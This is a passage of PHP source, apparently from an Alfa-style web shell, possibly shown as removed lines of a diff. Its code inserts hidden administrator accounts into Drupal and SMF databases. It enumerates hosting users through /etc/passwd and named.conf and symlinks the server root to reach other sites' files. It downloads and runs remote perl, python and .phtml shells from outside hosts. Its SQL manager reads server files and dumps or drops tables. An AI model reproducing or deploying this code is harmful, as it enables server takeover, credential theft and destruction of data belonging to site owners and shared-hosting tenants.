- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'mka7', 'inputSize' => '50', 'disabled' => true));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa4'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $getDescuid = @mysqli_query($conn, 'select uid from users order by uid desc limit 0,1');
- $getDescuid = @mysqli_fetch_assoc($getDescuid);
- $getDescuid = $getDescuid['uid'];
- $getdescuid = $getDescuid++;
- $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','mka7@pay-moon.com','filtered_html','1','Europe/Berlin','mka7@pay-moon.com')") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn));
- $sole = mysqli_num_rows($solevisible);
- if ($sole == 1) {
- $solevis = mysqli_fetch_assoc($solevisible);
- $res = $solevis['uid'];
- }
- $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if (isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf') {
- echo __pre() . '<center><center><div class="txtfont_header">| SMF |</div><p><p>' . getConfigHtml('smf') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'mka7', 'inputSize' => '50', 'disabled' => true),);
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $prefix = $_POST['alfa7'];
- $admin = $_POST['alfa8'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $setpwAlg = sha1(strtolower($admin) . 'solevisible');
- $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','mka7@pay-moon.com')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- echo '</div>';
- alfafooter();
- }
- function alfaMakePwd() {
- if (_alfa_file_exists('/etc/virtual/domainowners') || (_alfa_file_exists('/etc/named.conf') && _alfa_file_exists('/etc/valiases'))) {
- return '/home/{user}/public_html/';
- }
- $document = explode('/', $_SERVER['DOCUMENT_ROOT']);
- $public = end($document);
- array_pop($document);
- array_pop($document);
- $path = implode('/', $document) . '/{user}/' . $public;
- return $path;
- }
- function alfaGetDomains($state = false) {
- $state = 'named.conf';
- $lines = array();
- $lines = _alfa_file('/etc/named.conf');
- if (!$lines) {
- $lines = @scandir('/etc/valiases/');
- $state = 'valiases';
- if (!$lines) {
- $lines = @scandir('/var/named');
- $state = 'named';
- if (!$lines && $state) {
- $lines = _alfa_file('/etc/passwd');
- $state = 'passwd';
- }
- }
- }
- return array('lines' => $lines, 'state' => $state);
- }
- function alfasymlink() {
- alfahead();
- echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'c1get\')">| C1 getir | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'phtml\')">| PHTML File manager | </a></h3></center>';
- if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'symperl' || $_POST['alfa2'] == 'sympy')) {
- $sympath = alfaMakePwd();
- @mkdir('cgimka', 0755);
- @chdir('cgimka');
- alfacgihtaccess('cgi');
- $perl = file_get_contents('https://myofcl.github.io/mkaspyshell/symperl');
- $py = file_get_contents('https://myofcl.github.io/mkaspyshell/sympy');;
- $cginame = 'symperl.mka';
- $source = $perl;
- $lang = 'perl';
- if ($_POST['alfa2'] == 'sympy') {
- $cginame = 'pysymlink.mka';
- $source = $py;
- $lang = 'python';
- }
- @__write_file($cginame, $source);
- @chmod($cginame, 0755);
- echo __pre();
- $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true);
- if (strlen($resource) == 0) {
- echo AlfaiFrameCreator('cgialfa/' . $cginame);
- } else {
- echo $resource;
- }
- }
- if ($_POST['alfa4'] == 'c1get') {
- file_download('http://www.warezm.com/shell/c4.tar.gz');
- system('tar -zxvf c4.tar.gz');
- $url = $_SERVER['REQUEST_URI'];
- $parts = explode('/', $url);
- $dir = $_SERVER['SERVER_NAME'];
- for ($i = 0;$i < count($parts) - 1;$i++) {
- $dir.= $parts[$i] . '';
- }
- if (is_dir('c1')) {
- echo ' c1 yklendi pampa siktir git <a href="' . $dir . '/c1" target="_BLANK">C1 dizinine git </a>';
- } else {
- echo 'Kanka ben ykleyemedim manuel yklemeyi dene cpanel varsa cpanelden ykle';
- }
- }
- if ($_POST['alfa4'] == 'phtml') {
- $py = file_get_contents('https://myofcl.github.io/mkaspyshell/phtmlshell');
- $cginame = 'mka7.phtml';
- @__write_file($cginame, $py);
- @chmod($cginame, 0755);
- $dir = $_SERVER['SERVER_NAME'];
- for ($i = 0;$i < count($parts) - 1;$i++) {
- $dir.= $parts[$i] . '';
- }
- echo ' mka7.phtml oluturuldu';
- }
- if (isset($_POST['alfa4']) && $_POST['alfa4'] == 'SymFile') {
- if (function_exists('symlink') || _alfa_can_runCommand(true, true)) {
- echo __pre() . '
- <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
- <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
- <input type="text" name="symfile" placeholder="Example : mka7.txt" size="60"/>
- <p><input type="submit" value=" " name="symlink" /></p></form></center>';
- $path = $_POST['alfa5'];
- $symname = $_POST['alfa6'];
- $solevisible58 = $_POST['alfa7'];
- if ($solevisible58) {
- $new_name = str_replace('.', '_', basename($symname));
- $rand_dir = $new_name . rand(111, 9999);
- $sym_dir = 'mkasymlinkphp/' . $rand_dir . '/';
- @mkdir($sym_dir, 0777, true);
- alfacgihtaccess('sym', $sym_dir, $symname);
- _alfa_symlink("$path", "$sym_dir/$symname");
- echo __pre();
- echo '<center><b><font color="white">Click >> </font><a target="_blank" href="' . $sym_dir . '" ><b><font size="4">' . $symname . '</font></b></a></b></center>';
- }
- } else {
- echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
- }
- }
- if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'symphp') {
- $cant_symlink = true;
- if (function_exists('symlink') || _alfa_can_runCommand(false, false)) {
- @mkdir('mka7symlink', 0777);
- alfacgihtaccess('sym', 'mka7symlink/');
- _alfa_symlink('/', 'mka7symlink/root');
- $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
- if (_alfa_file_exists('/etc/named.conf') && !_alfa_file_exists('/etc/virtual/domainowners') && _alfa_file_exists('/etc/valiases/')) {
- echo '<center>';
- $lines = array();
- $anony_domains = array();
- $anonymous_users = array();
- $f_black = array();
- $error = false;
- $anonymous = false;
- $makepwd = '/home/{user}/public_html/';
- $domains = alfaGetDomains();
- $lines = $domains['lines'];
- $state = $domains['state'];
- $is_posix = function_exists('posix_getpwuid') && function_exists('fileowner');
- $can_runcmd = _alfa_can_runCommand(false, false);
- if (!$is_posix && !$can_runcmd) {
- $anonymous = true;
- $anony_domains = $domains['lines'];
- $lines = _alfa_file('/etc/passwd');
- }
- echo $table_header;
- $count = 1;
- $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
- foreach ($lines as $line) {
- $domain = '';
- $owner = '';
- if ($anonymous) {
- $explode = explode(':', $line);
- $owner = $explode[0];
- $owner_len = strlen($owner) - 1;
- $userid = $explode[2];
- if ((int)$userid < 500) continue;
- $domain = '[?????]';
- $temp_black = array();
- $finded = false;
- foreach ($anony_domains as $anony) {
- if ($state == 'named.conf') {
- if (@strstr($anony, 'zone')) {
- preg_match_all('#zone "(.*)"#', $anony, $data);
- $domain = $data[1][0];
- } else {
- continue;
- }
- } elseif ($state == 'named' || $state == 'valiases') {
- if ($anony == '.' || $anony == '..') continue;
- if ($state == 'named') $anony = rtrim($anony, '.db');
- $domain = $anony;
- }
- $sub_domain = str_replace(array('-', '.'), '', $domain);
- if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) {
- if (in_array($owner . $domain, $temp_black)) continue;
- $sympath = str_replace('{user}', $owner, $makepwd);
- $http = 'http://' . $domain;
- echo str_replace(array('{count}', '{http}', '{domain}', '{owner}', '{sympath}'), array($count, $http, $domain, $owner, $sympath), $template);
- $count++;
- $temp_black[] = $owner . $domain;
- $finded = true;
- }
- }
- if (!$finded) {
- $anonymous_users[] = $owner;
- }
- } else {
- if ($state == 'named.conf') {
- if (@strstr($line, 'zone')) {
- preg_match_all('#zone "(.*)"#', $line, $data);
- $domain = $data[1][0];
- } else {
- continue;
- }
- } elseif ($state == 'named' || $state == 'valiases') {
- if ($line == '.' || $line == '..') continue;
- if ($state == 'named') $line = rtrim($line, '.db');
- $domain = $line;
- }
- if (strlen(trim($domain)) > 2 && $state != 'passwd') {
- if (!_alfa_file_exists('/etc/valiases/' . $domain, false)) continue;
- if ($is_posix) {
- $user = @posix_getpwuid(@fileowner('/etc/valiases/' . $domain));
- $owner = $user['name'];
- } elseif ($can_runcmd) {
- $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false);
- }
- }
- }
- if (!$anonymous) {
- if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) continue;
- $sympath = str_replace('{user}', $owner, $makepwd);
- $http = 'http://' . $domain;
- if ($state == 'passwd') {
- $http = "javascript:alert('we cant find domain...')";
- }
- echo str_replace(array('{count}', '{http}', '{domain}', '{owner}', '{sympath}'), array($count, $http, $domain, $owner, $sympath), $template);
- $count++;
- $f_black[] = $owner . $domain;
- }
- }
- if ($anonymous) {
- foreach ($anonymous_users as $owner) {
- $sympath = str_replace('{user}', $owner, $makepwd);
- $http = "javascript:alert('we cant find domain...')";
- echo str_replace(array('{count}', '{http}', '{domain}', '{owner}', '{sympath}'), array($count, $http, '[????]', $owner, $sympath), $template);
- $count++;
- }
- }
- $cant_symlink = false;
- } else {
- $is_direct = false;
- $makepwd = alfaMakePwd();
- if (_alfa_file_exists('/etc/virtual/domainowners')) {
- $makepwd = '/home/{user}/public_html';
- $is_direct = true;
- }
- $sole = _alfa_file('/etc/virtual/domainowners');
- $count = 1;
- echo $table_header;
- $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
- if ($sole) {
- foreach ($sole as $visible) {
- if (@strstr($visible, ':')) {
- $solevisible = explode(':', $visible);
- $cwd = str_replace('{user}', trim($solevisible[1]), $makepwd);
- echo str_replace(array('{count}', '{user}', '{url}', '{cwd}'), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
- }
- }
- } else {
- $passwd = _alfa_file('/etc/passwd');
- if ($passwd) {
- $html = '';
- $is_named = false;
- $users = array();
- $domains = array();
- $uknowns = array();
- foreach ($passwd as $user) {
- $user = trim($user);
- $expl = explode(':', $user);
- if ((int)$expl[2] < 500) continue;
- $users[$expl[0]] = $expl[5];
- }
- $site_domains = @scandir('/etc/virtual/');
- if (!$site_domains) {
- $site_domains = alfaEx('ls /etc/virtual/');
- $site_domains = explode("
- ", $site_domains);
- if (!$site_domains) {
- $site_domains = _alfa_file('/etc/named.conf');
- if ($site_domains) {
- $is_named = true;
- }
- }
- }
- foreach ($site_domains as $line) {
- if ($is_named) {
- if (@strstr($line, 'zone')) {
- preg_match_all('#zone "(.*)"#', $line, $data);
- $domain = $data[1][0];
- if (strlen($domain > 2) && !empty($domain)) {
- $domains[] = $domain;
- }
- }
- } else {
- $domains[] = $line;
- }
- }
- $x = 1;
- foreach ($users as $user => $home) {
- foreach ($domains as $domain) {
- $user_len = strlen($user) - 1;
- $sub_domain = str_replace(array('-', '.'), '', $domain);
- $five_user = substr($user, 0, $user_len);
- $five_domain = substr($sub_domain, 0, $user_len);
- if ($five_user == $five_domain) {
- if ($is_direct) {
- $cwd = str_replace('{user}', $user, $makepwd);
- } else {
- $expl = explode('}/', $makepwd);
- $cwd = $home . '/' . $expl[1];
- }
- $html.= str_replace(array('{count}', '{user}', '{url}', '{cwd}'), array($x++, $user, $domain, $cwd), $template);
- } else {
- $uknowns[$user] = $home;
- }
- }
- }
- $uknowns = array_unique($uknowns);
- foreach ($uknowns as $user => $home) {
- if ($is_direct) {
- $cwd = str_replace('{user}', $user, $makepwd);
- } else {
- $expl = explode('}/', $makepwd);
- $cwd = $home . '/' . $expl[1];
- }
- $html.= str_replace(array('{count}', '{user}', '{url}', '{cwd}'), array($x++, $user, '[?????]', $cwd), $template);
- }
- echo ($html);
- }
- }
- echo '</table>';
- $cant_symlink = false;
- }
- } else {
- echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
- $cant_symlink = false;
- }
- if ($cant_symlink) echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
- echo '</center></table>';
- }
- echo '</div>';
- alfafooter();
- }
- function alfasql() {
- if (!isset($_POST['sql_host'])) {
- $_POST['sql_host'] = $_SESSION['sql_host'];
- $_POST['sql_login'] = $_SESSION['sql_login'];
- $_POST['sql_pass'] = $_SESSION['sql_pass'];
- $_POST['sql_base'] = $_SESSION['sql_base'];
- }
- class DbClass {
- public $type;
- public $link;
- public $res;
- function __construct($type) {
- $this->type = $type;
- }
- function connect($host, $user, $pass, $dbname) {
- switch ($this->type) {
- case 'mysql':
- if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) return true;
- break;
- case 'pgsql':
- $host = explode(':', $host);
- if (!$host[1]) $host[1] = 5432;
- if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
- break;
- }
- return false;
- }
- function selectdb($db) {
- switch ($this->type) {
- case 'mysql':
- if (@mysqli_select_db($db)) return true;
- break;
- }
- return false;
- }
- function query($str) {
- switch ($this->type) {
- case 'mysql':
- return $this->res = @mysqli_query($this->link, $str);
- break;
- case 'pgsql':
- return $this->res = @pg_query($this->link, $str);
- break;
- }
- return false;
- }
- function fetch() {
- $res = func_num_args() ? func_get_arg(0) : $this->res;
- switch ($this->type) {
- case 'mysql':
- return @mysqli_fetch_assoc($res);
- break;
- case 'pgsql':
- return @pg_fetch_assoc($res);
- break;
- }
- return false;
- }
- function listDbs() {
- switch ($this->type) {
- case 'mysql':
- return $this->query('SHOW databases');
- break;
- case 'pgsql':
- return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
- break;
- }
- return false;
- }
- function listTables() {
- switch ($this->type) {
- case 'mysql':
- return $this->res = $this->query('SHOW TABLES');
- break;
- case 'pgsql':
- return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
- break;
- }
- return false;
- }
- function error() {
- switch ($this->type) {
- case 'mysql':
- return @mysqli_error($this->link);
- break;
- case 'pgsql':
- return @pg_last_error();
- break;
- }
- return false;
- }
- function setCharset($str) {
- switch ($this->type) {
- case 'mysql':
- if (function_exists('mysql_set_charset')) return @mysqli_set_charset($this->link, $str);
- else $this->query('SET CHARSET ' . $str);
- break;
- case 'pgsql':
- return @pg_set_client_encoding($this->link, $str);
- break;
- }
- return false;
- }
- function loadFile($str) {
- switch ($this->type) {
- case 'mysql':
- return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
- break;
- case 'pgsql':
- $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;");
- $r = array();
- while ($i = $this->fetch()) $r[] = $i['file'];
- $this->query('drop table solevisible');
- return array('file' => implode("
- ", $r));
- break;
- }
- return false;
- }
- function dump($table, $fp = false) {
- switch ($this->type) {
- case 'mysql':
- $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
- $create = mysqli_fetch_array($res);
- $sql = $create[1] . ";
- ";
- if ($fp) fwrite($fp, $sql);
- else echo ($sql);
- $this->query('SELECT * FROM `' . $table . '`');
- $head = true;
- while ($item = $this->fetch()) {
- $columns = array();
- foreach ($item as $k => $v) {
- if ($v == null) $item[$k] = "''";
- elseif (is_numeric($v)) $item[$k] = $v;
- else $item[$k] = "'" . @mysqli_real_escape_string($this->link, $v) . "'";
- $columns[] = '`' . $k . '`';
- }
- if ($head) {
- $sql = 'INSERT INTO `' . $table . '` (' . implode(', ', $columns) . ") VALUES
- (" . implode(', ', $item) . ')';
- $head = false;
- } else $sql = "
- ,(" . implode(', ', $item) . ')';
- if ($fp) fwrite($fp, $sql);
- else echo ($sql);
- }
- if (!$head) if ($fp) fwrite($fp, ";
- ");
- else echo (";
- ");
- break;
- case 'pgsql':
- $this->query('SELECT * FROM ' . $table);
- while ($item = $this->fetch()) {
- $columns = array();
- foreach ($item as $k => $v) {
- $item[$k] = "'" . addslashes($v) . "'";
- $columns[] = $k;
- }
- $sql = 'INSERT INTO ' . $table . ' (' . implode(', ', $columns) . ') VALUES (' . implode(', ', $item) . ');' . "
- ";
- if ($fp) fwrite($fp, $sql);
- else echo ($sql);
- }
- break;
- }
- return false;
- }
- };
- $db = new DbClass($_POST['type']);
- if (@$_POST['alfa1'] == 'dumpfile' || @$_POST['alfa1'] == 'droptbl') {
- $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
- $db->selectdb($_POST['sql_base']);
- switch ($_POST['charset']) {
- case 'Windows-1251':
- $db->setCharset('calfa1251');
- break;
- case 'UTF-8':
- $db->setCharset('utf8');
- break;
- case 'KOI8-R':
- $db->setCharset('koi8r');
- break;
- case 'KOI8-U':
- $db->setCharset('koi8u');
- break;
- case 'calfa866':
- $db->setCharset('calfa866');
- break;
- }
- $json = json_decode($_POST['alfa2'], true);
- if (count($json['tbl']) > 0) {
- if ($_POST['alfa1'] == 'dumpfile') {
- if ($fp = @fopen($json['file'], 'w')) {
- foreach ($json['tbl'] as $v) $db->dump($v, $fp);
- fclose($fp);
- $dumpStatus = true;
- }
- } else {
- foreach ($json['tbl'] as $v) $db->query('DROP TABLE ' . $v);
- }
- }
- unset($_POST['alfa2']);
- }
- alfahead();
- echo "
- <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml('all') . "</p></center>
- <form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
- <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
- <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : 'UTF-8') . "'>
- <td><select name='type'><option value='mysql' ";
- if (@$_POST['type'] == 'mysql') echo 'selected';
- echo ">MySql</option><option value='pgsql' ";
- if (@$_POST['type'] == 'pgsql') echo 'selected';
- echo ">PostgreSql</option></select></td>
- <td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>
- <td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST['sql_login']) ? '' : htmlspecialchars($_POST['sql_login'])) . "'></td>
- <td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
- $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST['sql_base']) ? '' : htmlspecialchars($_POST['sql_base'])) . "'>";
- if (isset($_POST['sql_host'])) {
- if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
- $_SESSION['sql_host'] = $_POST['sql_host'];
- $_SESSION['sql_login'] = $_POST['sql_login'];
- $_SESSION['sql_pass'] = $_POST['sql_pass'];
- $_SESSION['sql_base'] = $_POST['sql_base'];
- switch ($_POST['charset']) {
- case 'Windows-1251':
- $db->setCharset('calfa1251');
- break;
- case 'UTF-8':
- $db->setCharset('utf8');
- break;
- case 'KOI8-R':
- $db->setCharset('koi8r');
- break;
- case 'KOI8-U':
- $db->setCharset('koi8u');
- break;
- case 'calfa866':
- $db->setCharset('calfa866');
- break;
- }
- $db->setCharset('utf8');
- $db->listDbs();
- echo "<select name=sql_base><option value=''></option>";
- while ($item = $db->fetch()) {
- list($key, $value) = each($item);
- echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
- }
- echo '</select>';
- } else echo $tmp;
- } else echo $tmp;
- echo "</td>
- <td><input type='submit' value=' '></td>
- <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
- </tr>
- </table>
- <script>mysql_cache['host']='" . addslashes($_POST['sql_host']) . "';mysql_cache['user']='" . addslashes($_POST['sql_login']) . "';mysql_cache['pass']='" . addslashes($_POST['sql_pass']) . "';mysql_cache['db']='" . addslashes($_POST['sql_base']) . "';mysql_cache['charset']='" . addslashes($_POST['charset']) . "';mysql_cache['type']='" . addslashes($_POST['type']) . "';mysql_cache['count']='" . addslashes($_POST['sql_count']) . "'</script>
- ";
- if (isset($db) && $db->link) {
- echo '<br/><table width=100% cellpadding=2 cellspacing=0>';
- if (!empty($_POST['sql_base'])) {
- $db->selectdb($_POST['sql_base']);
- echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
- $tbls_res = $db->listTables();
- while ($item = $db->fetch($tbls_res)) {
- list($key, $value) = each($item);
- if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `' . $value . '`'));
- $value = htmlspecialchars($value);
- echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href='javascript:void(0);' onclick=\"fs('0','" . $value . "')\"><span class='mysql_tables' style='font-weight:unset;'>" . $value . '</span></a>' . (empty($_POST['sql_count']) ? ' ' : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . '</nobr><br>';
- }
- echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>" . ($dumpStatus ? '<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>' : '') . "</td><td style='border-top:2px solid #666;'>";
- if (@$_POST['alfa1'] == 'select') {
- $_POST['alfa1'] = 'query';
- $_POST['alfa3'] = $_POST['alfa3'] ? $_POST['alfa3'] : 1;
- $db->query('SELECT COUNT(*) as n FROM `' . $_POST['alfa2'] . '`');
- $num = $db->fetch();
- $pages = ceil($num['n'] / 30);
- echo '<span>' . $_POST['alfa2'] . "</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . '>';
- echo " of $pages";
- if ($_POST['alfa3'] > 1) echo " <a href='javascript:void(0);' onclick=fs('1','[\"" . $_POST['alfa2'] . "\",\"" . ($_POST['alfa3'] - 1) . "\"]')>< Prev</a>";
- if ($_POST['alfa3'] < $pages) echo " <a href='javascript:void(0);' onclick=fs('1','[\"" . $_POST['alfa2'] . "\",\"" . ($_POST['alfa3'] + 1) . "\"]')>Next ></a>";
- $_POST['alfa3']--;
- $cache_table = $_POST['alfa2'];
- if ($_POST['type'] == 'pgsql') $_POST['alfa2'] = 'SELECT * FROM `' . $_POST['alfa2'] . '` LIMIT 30 OFFSET ' . ($_POST['alfa3'] * 30);
- else $_POST['alfa2'] = 'SELECT * FROM `' . $_POST['alfa2'] . '` LIMIT ' . ($_POST['alfa3'] * 30) . ',30';
- echo '<br><br>';
- }
- if ((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
- $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($_POST['sql_base']) . "' AND TABLE_NAME = '" . @addslashes($cache_table) . "' AND COLUMN_KEY = 'PRI'"));
- $db->query(@$_POST['alfa2']);
- if ($db->res !== false) {
- $title = false;
- echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
- $line = 1;
- while ($item = $db->fetch()) {
- if (!$title) {
- echo '<tr><th>#</th>';
- foreach ($item as $key => $value) {
- echo '<th>' . $key . '</th>';
- }
- reset($item);
- $title = true;
- echo '</tr><tr>';
- $line = 2;
- }
- if ($cache_table != '') {
- $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["' . $cache_table . '","' . (!$prikey['COLUMN_NAME'] ? 0 : $prikey['COLUMN_NAME']) . '","' . __ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME'] ? $item : $item[$prikey['COLUMN_NAME']]))) . '"]\')>Edit</a>';
- } else {
- $cacheMsg = '-';
- }
- echo '<tr class="l' . $line . '"><td>' . $cacheMsg . '</td>';
- $line = $line == 1 ? 2 : 1;
- foreach ($item as $key => $value) {
- if ($value == null) echo '<td><i>null</i></td>';
- else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
- }
- echo '</tr>';
- }
- echo '</table>';
- } else {
- echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
- }
- }
- echo ('</form>');
